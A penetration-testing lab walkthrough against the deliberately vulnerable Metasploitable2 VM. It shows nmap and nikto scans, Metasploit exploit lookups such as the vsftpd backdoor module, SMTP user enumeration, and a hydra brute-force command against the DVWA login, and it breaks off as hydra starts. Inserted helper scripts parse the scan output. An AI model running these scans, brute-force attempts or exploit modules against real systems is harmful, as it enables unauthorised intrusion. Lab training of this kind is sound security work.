Metasploitable2 Walkthrough


For this walk-through I use the Metasploit Framework to perform a penetration testing exercise against Metasploitable 2. I employ the following penetration testing phases: reconnaissance, threat modelling and vulnerability identification, and exploitation. Since this is a mock exercise, I leave out the pre-engagement, post-exploitation, risk analysis, and reporting phases.

Set-up

This metasploitable walk-through is performed in a virtual lab environment. Two virtual machines (VMs) are used. The first is a Kali VM and the second is the Metasploitable2 VM. Both VMs have their network interfaces connected to an internal Virtualbox network called vlabnet. There is a DHCP server on the virtual lab network to dynamically allocate IP addresses to hosts.

The following command may be used to set up the DHCP server:

VBoxManage dhcpserver add --netname vlabnet --ip 10.10.10.1 --netmask 255.255.255.0 --lowerip 10.10.10.100 --upperip 10.10.10.149 --enable

To verify that the DHCP server is available for the internal network, run VBoxManage.exe list dhcpservers, which should list the DHCP servers available for the respective networks.

So the walk-through is just me pretending to apply some arbitrary penetration testing approaches to the Metasploitable2 VM.

Also, to make it easier to copy and paste between the Kali VM and the host machine (for example to run Internet searches), it may be useful to install the VirtualBox Guest Additions and share the clipboard.

apt-get autoremove --purge
apt-get update
apt-get dist-upgrade
reboot
apt-get update
apt-get install -y virtualbox-guest-x11
reboot

Metasploitable2

Download the current version of Metasploitable 2 from the repository https://sourceforge.net/projects/metasploitable/. Extract the archive and locate the contents of the Metasploitable2-Linux directory. We will need these files to create a virtual machine within VirtualBox.

Create a new virtual machine in VirtualBox. You can review the contents of the .vmx file to get the system specification, but I have summarised it below for reference.

VM: Metasploitable2-Linux
OS: Ubuntu
CPU:  1 (max: 4)
RAM:  512MB
eth0: 00:0C:29:FA:DD:2A (nat)
eth1: 00:0C:29:FA:DD:34 (host only)
Desc: This is Metasploitable2 (Linux)

Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.

The default login and password is msfadmin:msfadmin.

Never expose this VM to an untrusted network (use NAT or Host-only mode if you have any questions what that means).

To contact the developers, please send email to [email protected]

I disconnected the second interface (eth1), and connected the first interface (eth0) to an internal network (intnet).

Preparation

First, attempt to identify the target. We use the netdiscover utility to identify the hosts on the network. Since the eth1 interface on the Kali VM is connected to vlabnet, and we know that the subnet for that interface is 10.10.10.0/24, we can run the following command:

root@kali:~# netdiscover -i eth1 -r 10.10.10.0/24 -P
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 10.10.10.1      08:00:27:ed:13:e7      1      60  PCS Systemtechnik GmbH
 10.10.10.101    00:0c:29:fa:dd:2a      1      60  VMware, Inc.

-- Active scan completed, 2 Hosts found.
root@kali:~# 

Since we used the -P switch, netdiscover produces parsable output. We can thus grep it to get only the IP addresses, e.g. netdiscover -i eth1 -r 10.10.10.0/24 -P | grep -o -E '([0-9]{1,3}\.){3}[0-9]{1,3}'. From the output we can identify two hosts. We know that 10.10.10.1 is the DHCP server, so the other IP must belong to the target, i.e. the Metasploitable2 host. We can further refine the command to exclude the DHCP server, e.g. netdiscover -i eth1 -r 10.10.10.0/24 -P | grep -o -E '([0-9]{1,3}\.){3}[0-9]{1,3}' | grep -v -E '10\.10\.10\.1$'. We can now proceed to identify the services running on that host using a port scanner such as nmap.

The previous command does not need this much processing, but it produces output that can be reused in scripts later. Next we scan all ports on the target host using the command nmap -Pn -n -sV -vv -p1-65535 --open 10.10.10.101. We get a result listing all open ports and the service versions.

root@kali:~# nmap -Pn -n -sV -vv -p1-65535 --open 10.10.10.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-27 10:38 EDT
NSE: Loaded 43 scripts for scanning.
Initiating ARP Ping Scan at 10:38
Scanning 10.10.10.101 [1 port]
Completed ARP Ping Scan at 10:38, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:38
Scanning 10.10.10.101 [65535 ports]
Discovered open port 80/tcp on 10.10.10.101
Discovered open port 25/tcp on 10.10.10.101
Discovered open port 23/tcp on 10.10.10.101
Discovered open port 139/tcp on 10.10.10.101
Discovered open port 22/tcp on 10.10.10.101
Discovered open port 5900/tcp on 10.10.10.101
Discovered open port 445/tcp on 10.10.10.101
Discovered open port 111/tcp on 10.10.10.101
Discovered open port 53/tcp on 10.10.10.101
Discovered open port 3306/tcp on 10.10.10.101
Discovered open port 21/tcp on 10.10.10.101
Discovered open port 2121/tcp on 10.10.10.101
Discovered open port 51622/tcp on 10.10.10.101
Discovered open port 47474/tcp on 10.10.10.101
Discovered open port 6697/tcp on 10.10.10.101
Discovered open port 34009/tcp on 10.10.10.101
Discovered open port 8180/tcp on 10.10.10.101
Discovered open port 514/tcp on 10.10.10.101
Discovered open port 6667/tcp on 10.10.10.101
Discovered open port 513/tcp on 10.10.10.101
Discovered open port 8009/tcp on 10.10.10.101
Discovered open port 3632/tcp on 10.10.10.101
Discovered open port 8787/tcp on 10.10.10.101
Discovered open port 35709/tcp on 10.10.10.101
Discovered open port 512/tcp on 10.10.10.101
Discovered open port 6000/tcp on 10.10.10.101
Discovered open port 5432/tcp on 10.10.10.101
Discovered open port 1099/tcp on 10.10.10.101
Discovered open port 2049/tcp on 10.10.10.101
Completed SYN Stealth Scan at 10:39, 7.93s elapsed (65535 total ports)
Initiating Service scan at 10:39
Scanning 30 services on 10.10.10.101
Completed Service scan at 10:41, 121.45s elapsed (30 services on 1 host)
NSE: Script scanning 10.10.10.101.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 10:41
Completed NSE at 10:41, 0.26s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 10:41
Completed NSE at 10:41, 0.07s elapsed
Nmap scan report for 10.10.10.101
Host is up, received arp-response (0.00052s latency).
Scanned at 2018-07-27 10:38:59 EDT for 130s
Not shown: 65505 closed ports
Reason: 65505 resets
PORT      STATE SERVICE     REASON         VERSION
21/tcp    open  ftp         syn-ack ttl 64 vsftpd 2.3.4
22/tcp    open  ssh         syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      syn-ack ttl 64 Linux telnetd
25/tcp    open  smtp        syn-ack ttl 64 Postfix smtpd
53/tcp    open  domain      syn-ack ttl 64 ISC BIND 9.4.2
80/tcp    open  http        syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     syn-ack ttl 64 2 (RPC #100000)
139/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        syn-ack ttl 64 netkit-rsh rexecd
513/tcp   open  login       syn-ack ttl 64
514/tcp   open  shell       syn-ack ttl 64 Netkit rshd
1099/tcp  open  rmiregistry syn-ack ttl 64 GNU Classpath grmiregistry
2049/tcp  open  nfs         syn-ack ttl 64 2-4 (RPC #100003)
2121/tcp  open  ftp         syn-ack ttl 64 ProFTPD 1.3.1
3306/tcp  open  mysql       syn-ack ttl 64 MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     syn-ack ttl 64 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  syn-ack ttl 64 PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         syn-ack ttl 64 VNC (protocol 3.3)
6000/tcp  open  X11         syn-ack ttl 64 (access denied)
6667/tcp  open  irc         syn-ack ttl 64 UnrealIRCd
6697/tcp  open  irc         syn-ack ttl 64 UnrealIRCd
8009/tcp  open  ajp13       syn-ack ttl 64 Apache Jserv (Protocol v1.3)
8180/tcp  open  http        syn-ack ttl 64 Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         syn-ack ttl 64 Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34009/tcp open  status      syn-ack ttl 64 1 (RPC #100024)
35709/tcp open  rmiregistry syn-ack ttl 64 GNU Classpath grmiregistry
47474/tcp open  mountd      syn-ack ttl 64 1-3 (RPC #100005)
51622/tcp open  nlockmgr    syn-ack ttl 64 1-4 (RPC #100021)
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.77 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.622MB)
root@kali:~# 
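The two pipelines above (the netdiscover -P grep and the nmap service table) are the kind of output that gets reused in scripts, so here is an added example, not part of the original walk-through, that turns both into machine-readable lines. The sample outputs are constructed from the results shown above; the nmap parser assumes the -vv form of the table, where the REASON column ("syn-ack ttl 64") sits between SERVICE and VERSION.

```shell
#!/bin/sh
# Added example (not from the original walk-through): turn the netdiscover -P and
# nmap -vv -sV output shown above into machine-readable lines.

# Constructed sample of `netdiscover -P` output, mirroring the two hosts found above.
NETDISCOVER_OUT='10.10.10.1      08:00:27:ed:13:e7      1      60  PCS Systemtechnik GmbH
10.10.10.101    00:0c:29:fa:dd:2a      1      60  VMware, Inc.'

# Constructed slice of the `nmap -Pn -n -sV -vv` service table (REASON column present).
NMAP_OUT='PORT      STATE SERVICE     REASON         VERSION
21/tcp    open  ftp         syn-ack ttl 64 vsftpd 2.3.4
22/tcp    open  ssh         syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
513/tcp   open  login       syn-ack ttl 64
3306/tcp  open  mysql       syn-ack ttl 64 MySQL 5.0.51a-3ubuntu5
MAC Address: 00:0C:29:FA:DD:2A (VMware)'

# target_ips GATEWAY: read netdiscover -P output on stdin and print every IPv4 address
# except GATEWAY. grep -x -F matches the whole line literally, so "10.10.10.1" cannot
# accidentally swallow another address that merely ends in the same digits.
target_ips() {
    grep -o -E '([0-9]{1,3}\.){3}[0-9]{1,3}' | grep -v -x -F "$1"
}

# nmap_services: read an nmap -vv -sV table on stdin and print "port|service|version"
# for each open port. With -vv the REASON column occupies fields 4-6, so the version
# string starts at field 7; a service with no detected version yields an empty column.
nmap_services() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
        version = ""
        for (i = 7; i <= NF; i++) version = version (i > 7 ? " " : "") $i
        print $1 "|" $3 "|" version
    }'
}

# Stand-alone demo: the target address, then one line per open service.
printf '%s\n' "$NETDISCOVER_OUT" | target_ips 10.10.10.1
printf '%s\n' "$NMAP_OUT" | nmap_services
```

The third column of nmap_services is exactly what one would hand to searchsploit, one query per service, instead of retyping version strings from the scan report.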

The remainder of the walk-through works through exploiting the service(s) associated with each of the open ports. To start the Metasploit console, issue the msfconsole command. However, first we need to cover some important Metasploit features:

Metasploit Database

Although it is not required, it is pretty useful to store details from Metasploit in a database for ease of access and to make results persistent, so that session continuity can be maintained. First, create a PostgreSQL database and user to be used by the Metasploit Framework. In the example below we create a user called msf_user and a database called msf_database.

# systemctl start postgresql
# su postgres
$ createuser --interactive msf_user -P
Enter password for new role: 
Enter it again: 
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
$ createdb --owner=msf_user msf_database
$ exit

Once the database has been created, start the Metasploit console and connect to the database using the details from the previous step. Once connected, use the db_status command to verify connectivity to the database:

db_connect msf_user:[PASSWORD]@127.0.0.1:5432/msf_database

There are a number of commands which make things a bit easier to manage from within the Metasploit console, such as db_nmap, which runs nmap scans and stores the results in the database. For a full list of commands, issue the help database command to see what is available.

Metasploit Workspaces

Once in msfconsole, Metasploit workspaces allow for logical separation of hosts and related data. This is useful for managing multiple projects and/or engagements. For this example we create a workspace called ‘metasploitable2’ using the command workspace -a metasploitable2.

Reconnaissance

After setting up the database and a separate workspace for the walk-through, we work within msfconsole to perform reconnaissance on the target. First we attempt to identify the services running on the target using the db_nmap command: db_nmap -A -p1-65535 -vv 10.10.10.101. The command populates the service versions, which may be queried using the services command.

Now that we know all the open ports on the target Metasploitable 2 host, as well as the versions of the services running (based on the nmap scan), we can proceed to the next phase and identify vulnerabilities in the services.

I like using exploitdb (https://www.exploit-db.com/) for identifying vulnerabilities; it is available on the command line in Kali using searchsploit. However, to get more details on the vulnerabilities and exploits it may be useful to have the full write-ups available via the associated papers (see https://github.com/offensive-security/exploit-database-papers). These can be installed using the following command, but note that it is approximately a 2GB download.

apt-get install -y exploitdb-papers

Threat Modelling and Vulnerability Identification

Vulnerability identification is pretty simple with Metasploit. We can search for known exploits based on the service details. For this section, we essentially iterate through the list of active services and search for known exploits or vulnerabilities. For brevity we don’t show the vulnerability identification for every service.

Port 21

msf > search vsftpd 2.3.4

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   auxiliary/gather/teamtalk_creds                        normal     TeamTalk Gather Credentials
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution


msf > info exploit/unix/ftp/vsftpd_234_backdoor

       Name: VSFTPD v2.3.4 Backdoor Command Execution
     Module: exploit/unix/ftp/vsftpd_234_backdoor
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-07-03
<snip>

Port 22

I could not find anything specific to this version of OpenSSH within Metasploit, so I searched for CVEs instead. I found https://www.cvedetails.com/vulnerability-list/vendor_id-97/product_id-585/version_id-169731/Openbsd-Openssh-4.7p1.html, but nothing for which I could find an exploit at this stage.

I kept searching for vulnerabilities and exploits against SSH and came across https://github.com/g0tmi1k/debian-ssh.

Port 25

msf > db_nmap -A -p 25 10.10.10.101
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-28 13:12 EDT
[*] Nmap: Nmap scan report for 10.10.10.101
[*] Nmap: Host is up (0.00087s latency).
[*] Nmap: PORT   STATE SERVICE VERSION
[*] Nmap: 25/tcp open  smtp    Postfix smtpd
[*] Nmap: |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
[*] Nmap: | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
[*] Nmap: | Not valid before: 2010-03-17T14:07:45
[*] Nmap: |_Not valid after:  2010-04-16T14:07:45
[*] Nmap: |_ssl-date: 2018-07-28T17:26:53+00:00; +14m31s from scanner time.
[*] Nmap: | sslv2:
[*] Nmap: |   SSLv2 supported
[*] Nmap: |   ciphers:
[*] Nmap: |     SSL2_RC4_128_WITH_MD5
[*] Nmap: |     SSL2_RC2_128_CBC_WITH_MD5
[*] Nmap: |     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
[*] Nmap: |     SSL2_RC4_128_EXPORT40_WITH_MD5
[*] Nmap: |     SSL2_DES_192_EDE3_CBC_WITH_MD5
[*] Nmap: |_    SSL2_DES_64_CBC_WITH_MD5
[*] Nmap: MAC Address: 00:0C:29:FA:DD:2A (VMware)
[*] Nmap: Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6
[*] Nmap: OS details: Linux 2.6.9 - 2.6.33
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host:  metasploitable.localdomain
[*] Nmap: Host script results:
[*] Nmap: |_clock-skew: mean: 14m30s, deviation: 0s, median: 14m30s
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   0.87 ms 10.10.10.101
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 16.28 seconds
msf > 

From the nmap scan we can see that the VRFY SMTP command is supported. We can exploit this to enumerate the users; see https://cr.yp.to/smtp/vrfy.html. We append the users found to our users file, msfusers.txt.
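The SMTP scan above carries three findings a defender would want pulled out automatically: VRFY is advertised, SSLv2 is still negotiable, and the certificate's "Not valid after" date is years before the server's own ssl-date. The following is an added example, not part of the walk-through, that reads that nmap output (with or without the msfconsole "[*] Nmap: " prefix) and prints one finding per line. The input is a constructed excerpt of the scan shown above.

```shell
#!/bin/sh
# Added example (not part of the walk-through): read the nmap SMTP script output
# above and print the defender-relevant findings, one per line.

# Constructed excerpt of the `db_nmap -A -p 25` output shown above, prefix included.
SMTP_SCAN='[*] Nmap: |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
[*] Nmap: | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA
[*] Nmap: | Not valid before: 2010-03-17T14:07:45
[*] Nmap: |_Not valid after:  2010-04-16T14:07:45
[*] Nmap: |_ssl-date: 2018-07-28T17:26:53+00:00; +14m31s from scanner time.
[*] Nmap: | sslv2:
[*] Nmap: |   SSLv2 supported'

# audit_smtp_scan: stdin is nmap output (plain, or with the msfconsole "[*] Nmap: " prefix).
# Flags VRFY/EXPN in the advertised command list, SSLv2 support, and a certificate whose
# "Not valid after" date is earlier than the server's ssl-date. Both dates are ISO-8601,
# so a plain string comparison orders them correctly without parsing.
audit_smtp_scan() {
    awk '
        { sub(/^\[\*\] Nmap: /, "") }
        /smtp-commands:/ {
            if ($0 ~ /[ ,]VRFY([ ,]|$)/) print "VRFY enabled: remote user enumeration possible"
            if ($0 ~ /[ ,]EXPN([ ,]|$)/) print "EXPN enabled: mailing-list expansion possible"
        }
        /Not valid after:/ { expires = $NF }
        /ssl-date:/        { now = $2; sub(/;$/, "", now) }
        /SSLv2 supported/  { print "SSLv2 supported: obsolete protocol still negotiable" }
        END {
            if (expires != "" && now != "" && expires < now)
                print "certificate expired: " expires
        }'
}

printf '%s\n' "$SMTP_SCAN" | audit_smtp_scan
```

On the Postfix side the first two findings map directly to main.cf settings: disable_vrfy_command = yes removes the VRFY verb, and smtpd_tls_protocols = !SSLv2, !SSLv3 stops the obsolete protocol versions from being offered; the certificate simply needs renewing.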

Port 53

I searched for vulnerabilities affecting BIND 9.4.2 and found https://www.cvedetails.com/vulnerability-list/vendor_id-64/product_id-144/version_id-51374/ISC-Bind-9.4.2.html.

Port 80

msf > db_nmap -A -p 80 10.10.10.101
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-28 15:55 EDT
[*] Nmap: Nmap scan report for 10.10.10.101
[*] Nmap: Host is up (0.00078s latency).
[*] Nmap: PORT   STATE SERVICE VERSION
[*] Nmap: 80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
[*] Nmap: |_http-title: Metasploitable2 - Linux
[*] Nmap: MAC Address: 00:0C:29:FA:DD:2A (VMware)
[*] Nmap: Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6
[*] Nmap: OS details: Linux 2.6.9 - 2.6.33
[*] Nmap: Network Distance: 1 hop
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   0.78 ms 10.10.10.101
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.05 seconds
msf > use auxiliary/scanner/http/dir_listing
msf auxiliary(scanner/http/dir_listing) > show options

Module options (auxiliary/scanner/http/dir_listing):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /                yes       The path to identify directoy listing
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.10.10.101/32  yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  256              yes       The number of concurrent threads
   VHOST                     no        HTTP server virtual host

msf auxiliary(scanner/http/dir_listing) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/dir_listing) > use auxiliary/scanner/http/dir_scanner 
msf auxiliary(scanner/http/dir_scanner) > show options

Module options (auxiliary/scanner/http/dir_scanner):

   Name        Current Setting                                          Required  Description
   ----        ---------------                                          --------  -----------
   DICTIONARY  /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt  no        Path of word dictionary to use
   PATH        /                                                        yes       The path  to identify files
   Proxies                                                              no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      10.10.10.101/32                                          yes       The target address range or CIDR identifier
   RPORT       80                                                       yes       The target port (TCP)
   SSL         false                                                    no        Negotiate SSL/TLS for outgoing connections
   THREADS     256                                                      yes       The number of concurrent threads
   VHOST                                                                no        HTTP server virtual host

msf auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 10.10.10.101
[+] Found http://10.10.10.101:80/cgi-bin/ 404 (10.10.10.101)
[+] Found http://10.10.10.101:80/doc/ 200 (10.10.10.101)
[+] Found http://10.10.10.101:80/icons/ 404 (10.10.10.101)
[+] Found http://10.10.10.101:80/index/ 200 (10.10.10.101)
[+] Found http://10.10.10.101:80/phpMyAdmin/ 200 (10.10.10.101)
[+] Found http://10.10.10.101:80/test/ 404 (10.10.10.101)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/dir_scanner) > use auxiliary/scanner/http/files_dir
msf auxiliary(scanner/http/files_dir) > show options

Module options (auxiliary/scanner/http/files_dir):

   Name        Current Setting                                           Required  Description
   ----        ---------------                                           --------  -----------
   DICTIONARY  /usr/share/metasploit-framework/data/wmap/wmap_files.txt  no        Path of word dictionary to use
   EXT                                                                   no        Append file extension to use
   PATH        /                                                         yes       The path  to identify files
   Proxies                                                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      10.10.10.101/32                                           yes       The target address range or CIDR identifier
   RPORT       80                                                        yes       The target port (TCP)
   SSL         false                                                     no        Negotiate SSL/TLS for outgoing connections
   THREADS     256                                                       yes       The number of concurrent threads
   VHOST                                                                 no        HTTP server virtual host

msf auxiliary(scanner/http/files_dir) > run

[*] Using code '404' as not found for files with extension .null
[*] Using code '404' as not found for files with extension .backup
[*] Using code '404' as not found for files with extension .bak
[*] Using code '404' as not found for files with extension .c
[*] Using code '404' as not found for files with extension .cfg
[*] Using code '404' as not found for files with extension .class
[*] Using code '404' as not found for files with extension .copy
[*] Using code '404' as not found for files with extension .conf
[*] Using code '404' as not found for files with extension .exe
[*] Using code '404' as not found for files with extension .html
[*] Using code '404' as not found for files with extension .htm
[*] Using code '404' as not found for files with extension .ini
[*] Using code '404' as not found for files with extension .log
[*] Using code '404' as not found for files with extension .old
[*] Using code '404' as not found for files with extension .orig
[*] Using code '404' as not found for files with extension .php
[+] Found http://10.10.10.101:80/index.php 200
[*] Using code '404' as not found for files with extension .tar
[*] Using code '404' as not found for files with extension .tar.gz
[*] Using code '404' as not found for files with extension .tgz
[*] Using code '404' as not found for files with extension .tmp
[*] Using code '404' as not found for files with extension .temp
[*] Using code '404' as not found for files with extension .txt
[*] Using code '404' as not found for files with extension .zip
[*] Using code '404' as not found for files with extension ~
[*] Using code '404' as not found for files with extension 
[+] Found http://10.10.10.101:80/dav 301
[+] Found http://10.10.10.101:80/index 200
[+] Found http://10.10.10.101:80/phpMyAdmin 301
[+] Found http://10.10.10.101:80/test 301
[*] Using code '404' as not found for files with extension 
[+] Found http://10.10.10.101:80/dav 301
[+] Found http://10.10.10.101:80/index 200
[+] Found http://10.10.10.101:80/phpMyAdmin 301
[+] Found http://10.10.10.101:80/test 301
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/files_dir) > use auxiliary/scanner/http/robots_txt 
msf auxiliary(scanner/http/robots_txt) > show options

Module options (auxiliary/scanner/http/robots_txt):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PATH     /                yes       The test path to find robots.txt file
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.10.10.101/32  yes       The target address range or CIDR identifier
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  256              yes       The number of concurrent threads
   VHOST                     no        HTTP server virtual host

msf auxiliary(scanner/http/robots_txt) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/robots_txt) >

Based on the recon, we have found the following URLs:

  • http://10.10.10.101:80/cgi-bin/
  • http://10.10.10.101:80/dav
  • http://10.10.10.101:80/doc/
  • http://10.10.10.101:80/icons/
  • http://10.10.10.101:80/index/
  • http://10.10.10.101:80/phpMyAdmin/
  • http://10.10.10.101:80/test/

I searched online for CVEs relating to Apache 2.2.8 and found https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-77221/Apache-Http-Server-2.2.8.html and https://httpd.apache.org/security/vulnerabilities_22.html. I then decided to run another vulnerability scan using nikto:

root@kali:~# nikto -h 10.10.10.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.101
+ Target Hostname:    10.10.10.101
+ Target Port:        80
+ Start Time:         2018-07-28 18:01:19 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output from the phpinfo() function was found.
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server leaks inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 92462, size: 40540, mtime: Tue Dec  9 12:24:00 2008
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /test/: Directory indexing found.
+ OSVDB-3092: /test/: This might be interesting...
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: Output from the phpinfo() function was found.
+ /phpinfo.php?cx[]=[...]<script>alert(foo)</script>: Output from the phpinfo() function was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpMyAdmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8311 requests: 0 error(s) and 29 item(s) reported on remote host
+ End Time:           2018-07-28 18:02:01 (GMT-4) (42 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

We identify a number of sites and items of interest from the automated scan. Visiting the site on port 80 using curl, we can see a link called DVWA to http://10.10.10.101/dvwa/login.php.

Port 80 - Damn Vulnerable Web Application

The password hint is provided on the landing page as username admin and password password. We log in using these credentials in a standard web browser; the first vulnerability is at http://10.10.10.101/dvwa/vulnerabilities/brute/.

Brute Force

We can use hydra to attempt to brute force the login, but first we need the error message that hydra will scan for to identify an unsuccessful attempt. If we just click on the Login button we get "Username and/or password incorrect." as the error message. The options used below wait (-w) 60 seconds for the page to respond, wait (-t) 5 seconds between requests, use password spraying or reverse brute force (-u), and exit on the first match found (-f).

$hydra -l admin -P passwords.lst 10.10.10.101 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect." -w 60 -t 5 -u -f 
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-03-27 11:27:14
[DATA] max 5 tasks per 1 server, overall 5 tasks, 8 login tries (l:1/p:8), ~2 tries per task
